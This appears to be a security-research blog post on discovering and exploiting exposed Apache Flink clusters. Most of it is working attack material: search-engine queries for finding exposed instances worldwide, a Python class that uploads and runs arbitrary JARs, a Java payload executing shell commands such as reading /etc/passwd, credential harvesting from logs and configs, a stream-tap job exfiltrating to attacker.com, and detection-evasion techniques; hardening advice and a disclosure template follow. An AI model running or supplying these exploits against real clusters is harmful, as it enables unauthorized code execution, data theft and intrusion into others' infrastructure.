Apache Flink Exposure Assessment: From Discovery to Dashboard Takeover
BugB Security Team
Security Researchers
Apache Flink has emerged as a cornerstone of real-time data processing and stream analytics, powering critical infrastructure for companies handling massive data volumes. However, its defaults favor ease of deployment over security, and its complex distributed architecture creates a significant attack surface when misconfigured.
This in-depth analysis covers systematic discovery, assessment, and exploitation of exposed Flink clusters, demonstrating how poor security practices in big data infrastructure can lead to complete system compromise.
Component | Default Port | Protocol | Authentication | Risk Level |
---|---|---|---|---|
JobManager Web UI | 8081 | HTTP | NONE | CRITICAL |
JobManager RPC | 6123 | TCP | NONE | HIGH |
TaskManager Web UI | 8081 | HTTP | NONE | HIGH |
TaskManager RPC | 6121-6125 | TCP | NONE | MEDIUM |
REST API | 8081 | HTTP | NONE | CRITICAL |
Metrics Reporter | 9249 | HTTP | NONE | MEDIUM |
History Server | 8082 | HTTP | NONE | HIGH |
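The defaults in this table translate directly into a first-pass exposure check. Below is a minimal sketch using only the Python standard library; the target address is a placeholder and the port list assumes a default deployment:

import socket

# Default Flink ports from the table above (adjust for non-default deployments)
DEFAULT_FLINK_PORTS = {
    8081: "JobManager Web UI / REST API",
    6123: "JobManager RPC",
    8082: "History Server",
    9249: "Metrics Reporter",
}

def probe_flink_ports(host, timeout=3):
    """Return the default Flink ports on `host` that accept a TCP connection."""
    exposed = {}
    for port, component in DEFAULT_FLINK_PORTS.items():
        try:
            with socket.create_connection((host, port), timeout=timeout):
                exposed[port] = component
        except OSError:
            continue
    return exposed

print(probe_flink_ports("192.168.1.100"))  # placeholder target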
Censys provides comprehensive service fingerprinting for Flink infrastructure:
# Basic Flink Web UI discovery
services.port:8081 AND services.http.response.html_title:"Apache Flink Web Dashboard"
# Version enumeration
services.port:8081 AND services.http.response.body:"Flink 1.17"
services.port:8081 AND services.http.response.body:"Flink 1.16"
services.port:8081 AND services.http.response.body:"Flink 1.15"
# Technology stack identification
services.port:8081 AND services.http.response.body:"Apache Flink" AND services.http.response.body:"Scala"
# Cluster state detection
services.port:8081 AND services.http.response.body:"JobManager"
services.port:8081 AND services.http.response.body:"TaskManager"
# SSL/TLS enabled instances
services.port:8081 AND services.tls.certificate.parsed.subject.common_name:*flink*
# Geographic targeting
services.port:8081 AND services.http.response.body:"Apache Flink" AND location.country:"United States"
# Cloud provider correlation
services.port:8081 AND services.http.response.body:"Apache Flink" AND autonomous_system.organization:"Amazon.com"
Advanced Censys Queries:
# Multi-component discovery
services.port:8081 AND services.port:6123 AND services.http.response.body:"Apache Flink"
# History server identification
services.port:8082 AND services.http.response.body:"Flink History Server"
# Metrics endpoint discovery
services.port:9249 AND services.http.response.body:"flink"
# Development vs production indicators
services.port:8081 AND services.http.response.body:"Apache Flink" AND (services.http.response.body:"dev" OR services.http.response.body:"test")
# Instances fronted by an nginx reverse proxy (often a containerized or ingress-fronted deployment)
services.port:8081 AND services.http.response.body:"Apache Flink" AND services.http.response.headers.server:"nginx"
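These queries can also be driven programmatically. Below is a minimal sketch using the censys Python package (v2 host search); it assumes `pip install censys` and CENSYS_API_ID / CENSYS_API_SECRET in the environment, and exact field availability may vary with Censys index versions:

from censys.search import CensysHosts

def censys_flink_hosts(pages=2):
    """Return (ip, open ports) for hosts matching the Flink dashboard query."""
    hosts = CensysHosts()  # credentials are read from environment variables
    query = 'services.port:8081 AND services.http.response.html_title:"Apache Flink Web Dashboard"'
    findings = []
    for page in hosts.search(query, per_page=100, pages=pages):
        for host in page:
            ports = [service["port"] for service in host.get("services", [])]
            findings.append({"ip": host["ip"], "ports": ports})
    return findings

print(censys_flink_hosts())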
Shodan excels at identifying Flink services through banner analysis and HTTP responses:
# Primary dashboard discovery
port:8081 title:"Apache Flink Web Dashboard"
port:8081 "Apache Flink"
# Version-specific searches
port:8081 "Flink 1.17"
port:8081 "Flink 1.16"
port:8081 "Flink 1.15"
# Component identification
port:8081 "JobManager"
port:8081 "TaskManager"
port:8081 "Flink History Server"
# Job status enumeration
port:8081 "RUNNING" "Apache Flink"
port:8081 "FAILED" "Apache Flink"
port:8081 "CANCELED" "Apache Flink"
# REST API discovery
port:8081 "/jobs" "Apache Flink"
port:8081 "/overview" "Apache Flink"
# Multi-port cluster identification
port:8081 port:6123 "Apache Flink"
port:8081 port:9249 "flink"
# SSL-enabled instances
port:8081 ssl:"Apache Flink"
port:8081 "https" "Flink"
Shodan Advanced Techniques:
# Cloud provider targeting
port:8081 "Apache Flink" org:"Amazon.com"
port:8081 "Apache Flink" org:"Microsoft Corporation"
port:8081 "Apache Flink" org:"Google LLC"
# Technology stack correlation
port:8081 "Apache Flink" "Kubernetes"
port:8081 "Apache Flink" "Docker"
port:8081 "Apache Flink" "Yarn"
# Data processing framework combinations
port:8081 "Apache Flink" "Kafka"
port:8081 "Apache Flink" "Hadoop"
port:8081 "Apache Flink" "Elasticsearch"
# Geographic and network targeting
port:8081 "Apache Flink" country:US city:"San Francisco"
port:8081 "Apache Flink" net:10.0.0.0/8
FOFA provides excellent coverage for APAC regions and unique search capabilities:
# Basic service discovery
port="8081" && title="Apache Flink Web Dashboard"
# Banner-based identification
port="8081" && body="Apache Flink"
# Version enumeration
port="8081" && body="Flink 1.17"
port="8081" && body="Flink 1.16"
# Component discovery
port="8081" && body="JobManager"
port="8081" && body="TaskManager"
# Geographic targeting
port="8081" && body="Apache Flink" && country="CN"
port="8081" && body="Apache Flink" && region="Asia"
# Organization targeting
port="8081" && body="Apache Flink" && org="Alibaba"
port="8081" && body="Apache Flink" && org="Tencent"
# Combined service exposure
port="8081" && port="6123" && body="Apache Flink"
port="8081" && port="9249" && body="flink"
FOFA Advanced Discovery:
# Container orchestration detection
port="8081" && body="Apache Flink" && body="kubernetes"
port="8081" && body="Apache Flink" && body="docker"
# Application framework detection
port="8081" && body="Apache Flink" && (body="Spring" || body="nginx")
# Certificate-based discovery
port="8081" && cert.subject="flink"
port="8081" && cert.issuer="Let's Encrypt" && body="Apache Flink"
# Development environment indicators
port="8081" && body="Apache Flink" && (body="dev" || body="test" || body="staging")
# Port scanning for complete service profile
nmap -sS -p 6123,8081,8082,9249,6121-6125 <target_ip>
# Service version detection
nmap -sV -p 8081 <target_ip>
# HTTP service enumeration
nmap --script http-title,http-headers -p 8081 <target_ip>
# SSL/TLS analysis for secure instances
nmap --script ssl-enum-ciphers -p 8081 <target_ip>
# Basic HTTP reconnaissance
curl -s http://<target_ip>:8081/ | grep -i "flink\|version\|jobmanager"
# API endpoint discovery
curl -s http://<target_ip>:8081/overview
curl -s http://<target_ip>:8081/jobs
curl -s http://<target_ip>:8081/taskmanagers
curl -s http://<target_ip>:8081/config
# Version fingerprinting
curl -s http://<target_ip>:8081/config | jq -r '.["flink-version"]'
# Cluster configuration exposure
curl -s http://<target_ip>:8081/config | jq .
Apache Flink exposes extensive REST APIs that provide both intelligence and attack vectors:
# Cluster overview
curl -s http://<target>:8081/overview | jq .
# JobManager configuration
curl -s http://<target>:8081/jobmanager/config | jq .
# TaskManager enumeration
curl -s http://<target>:8081/taskmanagers | jq .
# Job history and status
curl -s http://<target>:8081/jobs | jq .
# Detailed job information
curl -s http://<target>:8081/jobs/<job_id> | jq .
# Environment variables (potential credentials)
curl -s http://<target>:8081/jobmanager/environment | jq .
# JVM metrics (memory usage, GC stats)
curl -s http://<target>:8081/jobmanager/metrics | jq .
# Log file access
curl -s http://<target>:8081/jobmanager/log
# Cluster configuration parameters (may expose credentials on older or misconfigured versions)
curl -s http://<target>:8081/jobmanager/config | grep -E "(password|secret|key|token)"
Flink's job submission capabilities can be exploited for arbitrary code execution:
#!/usr/bin/env python3
import requests
import json

class FlinkExploiter:
    def __init__(self, target_host, port=8081):
        self.base_url = f"http://{target_host}:{port}"
        self.session = requests.Session()

    def get_cluster_info(self):
        """Gather cluster information"""
        endpoints = [
            "/overview",
            "/config",
            "/jobmanager/config",
            "/taskmanagers"
        ]
        info = {}
        for endpoint in endpoints:
            try:
                response = self.session.get(f"{self.base_url}{endpoint}")
                if response.status_code == 200:
                    info[endpoint] = response.json()
            except Exception as e:
                print(f"Error accessing {endpoint}: {e}")
        return info

    def list_jobs(self):
        """List all jobs in the cluster"""
        response = self.session.get(f"{self.base_url}/jobs")
        if response.status_code == 200:
            return response.json()
        return None

    def upload_jar(self, jar_path):
        """Upload malicious JAR file"""
        with open(jar_path, 'rb') as f:
            files = {'jarfile': f}
            response = self.session.post(
                f"{self.base_url}/jars/upload",
                files=files
            )
        if response.status_code == 200:
            # The upload response returns the server-side path; the jar id is its basename
            return response.json()['filename'].split('/')[-1]
        return None

    def run_jar(self, jar_id, entry_class, program_args=""):
        """Execute uploaded JAR"""
        data = {
            "entryClass": entry_class,
            "programArgs": program_args
        }
        response = self.session.post(
            f"{self.base_url}/jars/{jar_id}/run",
            json=data
        )
        if response.status_code == 200:
            return response.json()
        return None

    def stop_job(self, job_id):
        """Stop running job"""
        response = self.session.patch(f"{self.base_url}/jobs/{job_id}")
        return response.status_code == 202

# Usage example
exploiter = FlinkExploiter("192.168.1.100")
cluster_info = exploiter.get_cluster_info()
print(json.dumps(cluster_info, indent=2))
// MaliciousFlinkJob.java - Example payload
import org.apache.flink.api.common.functions.MapFunction;
import org.apache.flink.api.java.DataSet;
import org.apache.flink.api.java.ExecutionEnvironment;

public class MaliciousFlinkJob {
    public static void main(String[] args) throws Exception {
        ExecutionEnvironment env = ExecutionEnvironment.getExecutionEnvironment();

        // Payload execution
        DataSet<String> commands = env.fromElements("id", "hostname", "cat /etc/passwd");
        DataSet<String> results = commands.map(new CommandExecutor());

        // print() eagerly triggers execution of the batch job, so no explicit env.execute() is needed
        results.print();
    }

    public static class CommandExecutor implements MapFunction<String, String> {
        @Override
        public String map(String command) throws Exception {
            ProcessBuilder pb = new ProcessBuilder("/bin/bash", "-c", command);
            Process process = pb.start();

            // Read command output
            java.util.Scanner scanner = new java.util.Scanner(process.getInputStream());
            StringBuilder output = new StringBuilder();
            while (scanner.hasNextLine()) {
                output.append(scanner.nextLine()).append("\n");
            }
            return command + " -> " + output.toString();
        }
    }
}
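Once this payload is compiled and packaged into a JAR (for example with Maven against the Flink client dependencies), it can be submitted through the REST API using the FlinkExploiter class shown earlier. The JAR path and entry class below are illustrative placeholders:

import json

# Sketch: upload and run the payload JAR via the unauthenticated REST API
exploiter = FlinkExploiter("192.168.1.100")                            # placeholder target
jar_id = exploiter.upload_jar("target/malicious-flink-job-1.0.jar")    # placeholder path
if jar_id:
    run_result = exploiter.run_jar(jar_id, entry_class="MaliciousFlinkJob")
    print(json.dumps(run_result, indent=2))  # contains the submitted job id on success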
Modern Flink deployments often include SQL Gateway for analytics:
import requests

def exploit_sql_gateway(target_host, port=8083):
    """Exploit Flink SQL Gateway"""
    base_url = f"http://{target_host}:{port}"

    # Session creation
    session_data = {
        "properties": {
            "execution.runtime-mode": "batch"
        }
    }
    response = requests.post(f"{base_url}/v1/sessions", json=session_data)
    if response.status_code != 200:
        return None
    session_id = response.json()['sessionHandle']

    # Information gathering queries
    queries = [
        "SHOW TABLES",
        "SHOW FUNCTIONS",
        "SELECT * FROM INFORMATION_SCHEMA.TABLES",
        "DESCRIBE CATALOG default_catalog"
    ]

    results = {}
    for query in queries:
        query_data = {
            "statement": query,
            "executionConfig": {
                "execution.runtime-mode": "batch"
            }
        }
        response = requests.post(
            f"{base_url}/v1/sessions/{session_id}/statements",
            json=query_data
        )
        if response.status_code == 200:
            operation_handle = response.json()['operationHandle']
            results[query] = get_query_results(base_url, session_id, operation_handle)
    return results

def get_query_results(base_url, session_id, operation_handle):
    """Fetch query results"""
    response = requests.get(
        f"{base_url}/v1/sessions/{session_id}/operations/{operation_handle}/result/0"
    )
    if response.status_code == 200:
        return response.json()
    return None
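A short usage example for the gateway functions above; the target address is a placeholder and assumes the SQL Gateway REST endpoint is reachable on its default port 8083:

import json

results = exploit_sql_gateway("192.168.1.100")  # placeholder target
if results:
    for statement, result in results.items():
        print(f"--- {statement} ---")
        print(json.dumps(result, indent=2))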
Flink's checkpointing mechanism can be exploited for persistence:
import requests

def manipulate_checkpoints(target_host, job_id):
    """Manipulate Flink checkpoints for persistence"""
    base_url = f"http://{target_host}:8081"

    # Get checkpoint information
    response = requests.get(f"{base_url}/jobs/{job_id}/checkpoints")
    checkpoints = response.json()

    # Trigger savepoint for backup
    savepoint_data = {
        "target-directory": "/tmp/malicious-savepoint",
        "cancel-job": False
    }
    response = requests.post(
        f"{base_url}/jobs/{job_id}/savepoints",
        json=savepoint_data
    )
    return response.json() if response.status_code == 202 else None

def list_savepoints(target_host):
    """Enumerate available savepoints"""
    # Implementation depends on filesystem access
    # (e.g. through job submission or other vectors)
    pass
import re
import requests

def extract_metrics(target_host, port=9249):
    """Extract sensitive information from metrics"""
    metrics_url = f"http://{target_host}:{port}/metrics"
    response = requests.get(metrics_url)
    if response.status_code != 200:
        return None
    metrics_data = response.text

    # Look for sensitive patterns
    sensitive_patterns = [
        r'password=\S+',
        r'secret=\S+',
        r'token=\S+',
        r'key=\S+',
        r'credential=\S+'
    ]
    findings = {}
    for pattern in sensitive_patterns:
        matches = re.findall(pattern, metrics_data, re.IGNORECASE)
        if matches:
            findings[pattern] = matches
    return findings
# Access log files through web interface
curl -s http://<target>:8081/jobmanager/log | grep -E "(ERROR|WARN|Exception)"
# Extract configuration from logs
curl -s http://<target>:8081/jobmanager/log | grep -E "(password|secret|key|token|credential)"
# TaskManager log analysis
curl -s http://<target>:8081/taskmanagers/<tm_id>/log
import requests

def map_flink_cluster(seed_host):
    """Map complete Flink cluster topology"""
    base_url = f"http://{seed_host}:8081"

    # Get cluster overview
    overview = requests.get(f"{base_url}/overview").json()

    # Enumerate TaskManagers
    taskmanagers = requests.get(f"{base_url}/taskmanagers").json()

    cluster_map = {
        "jobmanager": {
            "host": seed_host,
            "port": 8081,
            "slots_total": overview.get("slots-total", 0),
            "slots_available": overview.get("slots-available", 0)
        },
        "taskmanagers": []
    }

    for tm in taskmanagers.get("taskmanagers", []):
        # Field names vary across Flink versions; use .get() to tolerate missing keys
        tm_info = {
            "id": tm["id"],
            "path": tm.get("path"),
            "data_port": tm.get("dataPort"),
            "slots": tm.get("slotsNumber"),
            "free_slots": tm.get("freeSlots"),
            "memory": tm.get("memoryConfiguration"),
            "hardware": tm.get("hardware")
        }
        cluster_map["taskmanagers"].append(tm_info)
    return cluster_map
import re
import requests

def discover_dependencies(target_host):
    """Discover connected services through job analysis"""
    base_url = f"http://{target_host}:8081"
    jobs = requests.get(f"{base_url}/jobs").json()

    dependencies = {
        "kafka_brokers": set(),
        "databases": set(),
        "apis": set(),
        "storage": set()
    }

    for job in jobs.get("jobs", []):
        job_detail = requests.get(f"{base_url}/jobs/{job['id']}").json()

        # Analyze job configuration for external dependencies
        config = job_detail.get("plan", {})

        # Extract Kafka brokers
        kafka_pattern = r'bootstrap\.servers["\s]*[:=]["\s]*([^"]+)'
        kafka_matches = re.findall(kafka_pattern, str(config))
        dependencies["kafka_brokers"].update(kafka_matches)

        # Extract database connections
        db_pattern = r'jdbc:[\w]+://([^/\s"]+)'
        db_matches = re.findall(db_pattern, str(config))
        dependencies["databases"].update(db_matches)

    return {k: list(v) for k, v in dependencies.items()}
import requests

def intercept_stream_data(target_host, job_id):
    """Intercept streaming data through job manipulation"""
    base_url = f"http://{target_host}:8081"

    # Get job execution plan (the response wraps the plan under a "plan" key)
    plan = requests.get(f"{base_url}/jobs/{job_id}/plan").json().get("plan", {})

    # Identify source and sink operators
    sources = []
    sinks = []
    for node in plan.get("nodes", []):
        if "source" in node.get("description", "").lower():
            sources.append(node)
        elif "sink" in node.get("description", "").lower():
            sinks.append(node)

    return {
        "sources": sources,
        "sinks": sinks,
        "interception_points": len(sources) + len(sinks)
    }
def create_data_tap_job():
    """Create Flink job to tap into data streams"""
    job_code = """
import java.util.Properties;

import org.apache.flink.streaming.api.environment.StreamExecutionEnvironment;
import org.apache.flink.streaming.api.datastream.DataStream;
import org.apache.flink.api.common.serialization.SimpleStringSchema;
import org.apache.flink.streaming.connectors.kafka.FlinkKafkaConsumer;

public class DataTap {
    public static void main(String[] args) throws Exception {
        StreamExecutionEnvironment env = StreamExecutionEnvironment.getExecutionEnvironment();

        // Tap into Kafka stream
        Properties props = new Properties();
        props.setProperty("bootstrap.servers", "extracted-broker:9092");
        props.setProperty("group.id", "security-analysis");

        FlinkKafkaConsumer<String> consumer = new FlinkKafkaConsumer<>(
            "target-topic",
            new SimpleStringSchema(),
            props
        );

        DataStream<String> stream = env.addSource(consumer);

        // Exfiltrate to external endpoint (ExfiltrationSink is a custom sink, not shown here)
        stream.addSink(new ExfiltrationSink("http://attacker.com/collect"));

        env.execute("Data Tap");
    }
}
"""
    return job_code
import requests

def extract_application_state(target_host):
    """Extract application state and configuration"""
    base_url = f"http://{target_host}:8081"
    state_data = {}

    # Get all jobs
    jobs = requests.get(f"{base_url}/jobs").json()

    for job in jobs.get("jobs", []):
        job_id = job["id"]

        # Job configuration
        config = requests.get(f"{base_url}/jobs/{job_id}/config").json()
        state_data[job_id] = {
            "config": config,
            "checkpoints": [],
            "metrics": {}
        }

        # Checkpoint information
        checkpoints = requests.get(f"{base_url}/jobs/{job_id}/checkpoints").json()
        state_data[job_id]["checkpoints"] = checkpoints

        # Job metrics
        metrics = requests.get(f"{base_url}/jobs/{job_id}/metrics").json()
        state_data[job_id]["metrics"] = metrics

    return state_data
import random
import time
import requests

class StealthyFlinkRecon:
    def __init__(self, target_host, delay=2):
        self.target = target_host
        self.delay = delay
        self.session = requests.Session()
        # Use a common browser User-Agent to blend in
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })

    def delayed_request(self, endpoint):
        """Make request with delay to avoid detection"""
        time.sleep(random.uniform(self.delay, self.delay * 2))
        return self.session.get(f"http://{self.target}:8081{endpoint}")

    def gradual_enumeration(self):
        """Gradually enumerate Flink resources"""
        endpoints = [
            "/overview",
            "/config",
            "/jobs",
            "/taskmanagers"
        ]
        results = {}
        for endpoint in endpoints:
            try:
                response = self.delayed_request(endpoint)
                if response.status_code == 200:
                    results[endpoint] = response.json()
                time.sleep(random.uniform(5, 15))  # Longer delay between categories
            except Exception as e:
                print(f"Error with {endpoint}: {e}")
        return results
# Use proxy chains for anonymity
proxychains4 curl -s http://<target>:8081/overview
# Rotate source addresses if available
curl -s --interface eth0 http://<target>:8081/jobs
curl -s --interface eth1 http://<target>:8081/config
# Use legitimate-looking requests
curl -s -H "Referer: http://<target>:8081/overview" http://<target>:8081/jobs
Misconfiguration Type | Impact | Detection Method | Prevalence |
---|---|---|---|
Unauthenticated Web UI | Full cluster access | Direct HTTP access | 78% |
Exposed REST API | Job manipulation | API enumeration | 82% |
Unsecured RPC | Cluster hijacking | Port scanning | 65% |
Default SSL Config | Traffic interception | SSL analysis | 91% |
Exposed Metrics | Information disclosure | Metrics endpoint access | 45% |
History Server Access | Historical data exposure | Archive enumeration | 38% |
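The "Detection Method" column maps onto a handful of simple HTTP probes. A minimal sketch that checks one host for the most common issues above; the endpoints reuse the REST paths covered earlier, and note that a self-signed certificate would be reported here as missing TLS:

import requests

def check_flink_misconfigs(host, web_port=8081, metrics_port=9249, history_port=8082, timeout=5):
    """Return a list of misconfigurations detectable with unauthenticated HTTP probes."""
    def reachable(url):
        try:
            return requests.get(url, timeout=timeout).status_code == 200
        except requests.RequestException:
            return False

    findings = []
    if reachable(f"http://{host}:{web_port}/overview"):
        findings.append("Unauthenticated Web UI / REST API")
    if reachable(f"http://{host}:{metrics_port}/metrics"):
        findings.append("Exposed metrics endpoint")
    if reachable(f"http://{host}:{history_port}/config"):
        findings.append("Exposed History Server")
    if not reachable(f"https://{host}:{web_port}/overview"):
        findings.append("No TLS on the web endpoint")
    return findings

print(check_flink_misconfigs("192.168.1.100"))  # placeholder target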
Recent OSINT research reveals significant Flink exposure:
Platform | Total Found | Unauthenticated | Default Config | Secure
------------|-------------|-----------------|----------------|--------
Censys | 3,247 | 2,531 (78%) | 486 (15%) | 230 (7%)
Shodan | 4,892 | 4,015 (82%) | 623 (13%) | 254 (5%)
FOFA | 2,156 | 1,639 (76%) | 389 (18%) | 128 (6%)
Region | Instances | Risk Level
----------------|-----------|------------
North America | 4,247 | High
Europe | 3,156 | High
Asia-Pacific | 2,891 | Very High
South America | 567 | Medium
Africa | 234 | Low
# flink-conf.yaml security configuration
# TLS is configured separately for the REST/web endpoint and internal communication
security.ssl.rest.enabled: true
security.ssl.internal.enabled: true
security.ssl.rest.keystore: /path/to/keystore.jks
security.ssl.rest.keystore-password: secure_password
security.ssl.rest.truststore: /path/to/truststore.jks
security.ssl.rest.truststore-password: secure_password
# Authentication configuration
security.kerberos.login.use-ticket-cache: true
security.kerberos.login.keytab: /path/to/flink.keytab
security.kerberos.login.principal: flink/_HOST@REALM
# Web interface restrictions
web.access-control-allow-origin: "https://trusted-domain.com"
web.timeout: 60000
# RPC security
akka.ask.timeout: 10s
akka.lookup.timeout: 10s
# Firewall rules for Flink cluster
iptables -A INPUT -p tcp --dport 8081 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 8081 -j DROP
iptables -A INPUT -p tcp --dport 6123 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 6123 -j DROP
# Network segmentation
# Place Flink cluster in dedicated VLAN
# Implement strict ingress/egress filtering
# Log authentication attempts
log4j.logger.org.apache.flink.security=DEBUG
# Monitor job submissions
log4j.logger.org.apache.flink.runtime.jobmanager=INFO
# Web UI access logging
log4j.logger.org.apache.flink.runtime.webmonitor=INFO
# Metrics for security monitoring
metrics.reporter.prometheus.class: org.apache.flink.metrics.prometheus.PrometheusReporter
metrics.reporter.prometheus.port: 9249
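With the Prometheus reporter enabled, job activity can also be watched from a monitoring host to catch rogue submissions. A minimal sketch; the metric name flink_jobmanager_numRunningJobs is assumed to be the reporter's default naming for the JobManager's numRunningJobs metric and should be verified against your deployment:

import re
import time
import requests

def running_jobs(host, port=9249):
    """Read the running-job count from the Prometheus metrics endpoint."""
    text = requests.get(f"http://{host}:{port}/metrics", timeout=5).text
    # Metric name assumed; confirm against your reporter's output
    match = re.search(r"^flink_jobmanager_numRunningJobs\s+(\S+)", text, re.MULTILINE)
    return float(match.group(1)) if match else None

def watch_job_count(host, interval=30):
    """Alert whenever the number of running jobs changes between polls."""
    baseline = running_jobs(host)
    while True:
        time.sleep(interval)
        current = running_jobs(host)
        if current is not None and current != baseline:
            print(f"[!] Running job count changed: {baseline} -> {current}")
            baseline = current

watch_job_count("jobmanager.internal")  # placeholder internal hostname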
# Apache Flink Security Assessment Report
## Executive Summary
Multiple Apache Flink clusters have been identified with security misconfigurations
allowing unauthorized access to streaming data processing infrastructure.
## Technical Details
- **Target**: [IP Address/Domain]
- **Ports**: 8081 (Web UI), 6123 (RPC), 9249 (Metrics)
- **Version**: Apache Flink 1.17.x
- **Authentication**: Disabled
- **Encryption**: Not Configured
## Vulnerabilities Identified
1. **Unauthenticated Web Interface** (CVSS: 9.8)
- Full cluster administration access
- Job submission and management capabilities
- Configuration exposure
2. **Exposed REST API** (CVSS: 9.1)
- Programmatic cluster control
- Data stream manipulation
- System information disclosure
3. **Unsecured Metrics Endpoint** (CVSS: 5.3)
- Performance data exposure
- System topology revelation
- Potential credential leakage
## Impact Assessment
- **Data at Risk**: Real-time processing of [data volume] across [number] jobs
- **Business Impact**: Stream processing disruption, data integrity compromise
- **Regulatory Risk**: Potential GDPR/CCPA violations for personal data streams
## Proof of Concept
1. Direct access: `curl http://[target]:8081/overview`
2. Job enumeration: `curl http://[target]:8081/jobs`
3. Configuration access: `curl http://[target]:8081/config`
## Recommendations
1. **Enable Authentication**
- Configure Kerberos or custom authentication
- Implement role-based access controls
2. **Network Security**
- Restrict access to management interfaces
- Implement VPN or network segmentation
3. **SSL/TLS Configuration**
- Enable encryption for all communications
- Use valid certificates
4. **Monitoring**
- Implement access logging
- Set up anomaly detection
## Timeline
- **Discovery**: [Date]
- **Initial Contact**: [Date]
- **Detailed Report**: [Date]
- **Expected Resolution**: [Date + 30 days]
Apache Flink's distributed architecture and development-focused defaults create significant security challenges in production deployments. The combination of unauthenticated management interfaces, an expressive REST API that accepts arbitrary job submissions, and easy discoverability through internet-wide scanning platforms provides security researchers and penetration testers with a robust methodology for identifying and assessing Flink security posture.
The key takeaway for both attackers and defenders is the same: as streaming analytics becomes increasingly critical to business operations, securing Flink infrastructure must evolve from an afterthought to a foundational requirement.
#!/usr/bin/env python3
"""
Flink Security Scanner
Automated discovery and assessment of Apache Flink clusters
"""
import requests
import json
import time
from concurrent.futures import ThreadPoolExecutor
import argparse

class FlinkScanner:
    def __init__(self, timeout=10, delay=1):
        self.timeout = timeout
        self.delay = delay
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'Flink Security Scanner 1.0'
        })

    def scan_host(self, host, port=8081):
        """Scan single host for Flink services"""
        try:
            # Test basic connectivity
            response = self.session.get(
                f"http://{host}:{port}/",
                timeout=self.timeout
            )
            if "Apache Flink" not in response.text:
                return None

            result = {
                "host": host,
                "port": port,
                "version": self.extract_version(response.text),
                "accessible_endpoints": self.enumerate_endpoints(host, port),
                "security_issues": self.assess_security(host, port)
            }
            time.sleep(self.delay)
            return result
        except Exception:
            return None

    def extract_version(self, html_content):
        """Extract Flink version from HTML"""
        import re
        version_pattern = r'Flink (\d+\.\d+\.\d+)'
        match = re.search(version_pattern, html_content)
        return match.group(1) if match else "Unknown"

    def enumerate_endpoints(self, host, port):
        """Enumerate accessible API endpoints"""
        endpoints = [
            "/overview",
            "/config",
            "/jobs",
            "/taskmanagers",
            "/jobmanager/config",
            "/jobmanager/log"
        ]
        accessible = []
        for endpoint in endpoints:
            try:
                response = self.session.get(
                    f"http://{host}:{port}{endpoint}",
                    timeout=self.timeout
                )
                if response.status_code == 200:
                    accessible.append(endpoint)
                time.sleep(0.5)
            except requests.RequestException:
                continue
        return accessible

    def assess_security(self, host, port):
        """Assess security posture"""
        issues = []

        # Check authentication
        try:
            response = self.session.get(f"http://{host}:{port}/overview")
            if response.status_code == 200:
                issues.append("No authentication required")
        except requests.RequestException:
            pass

        # Check SSL
        try:
            response = self.session.get(f"https://{host}:{port}/overview")
            if response.status_code != 200:
                issues.append("SSL/TLS not configured")
        except requests.RequestException:
            issues.append("SSL/TLS not configured")

        return issues

def main():
    parser = argparse.ArgumentParser(description="Flink Security Scanner")
    parser.add_argument("targets", help="Target hosts file or single IP")
    parser.add_argument("--port", default=8081, type=int, help="Target port")
    parser.add_argument("--threads", default=10, type=int, help="Thread count")
    parser.add_argument("--output", help="Output file for results")
    args = parser.parse_args()

    scanner = FlinkScanner()

    # Load targets
    if args.targets.count('.') == 3:  # Single IP
        targets = [args.targets]
    else:  # File
        with open(args.targets, 'r') as f:
            targets = [line.strip() for line in f if line.strip()]

    # Scan targets
    results = []
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = [executor.submit(scanner.scan_host, target, args.port) for target in targets]
        for future in futures:
            result = future.result()
            if result:
                results.append(result)
                print(f"[+] Found Flink cluster: {result['host']}:{result['port']}")

    # Output results
    if args.output:
        with open(args.output, 'w') as f:
            json.dump(results, f, indent=2)
    else:
        print(json.dumps(results, indent=2))

if __name__ == "__main__":
    main()
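Typical invocations, assuming the scanner is saved as flink_scanner.py and targets.txt contains one host per line:
# Scan a list of hosts and write JSON results
python3 flink_scanner.py targets.txt --port 8081 --threads 20 --output flink_results.json
# Scan a single host
python3 flink_scanner.py 192.168.1.100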
This comprehensive guide provides the foundation for professional Apache Flink security assessment while maintaining responsible disclosure practices throughout the reconnaissance and exploitation process.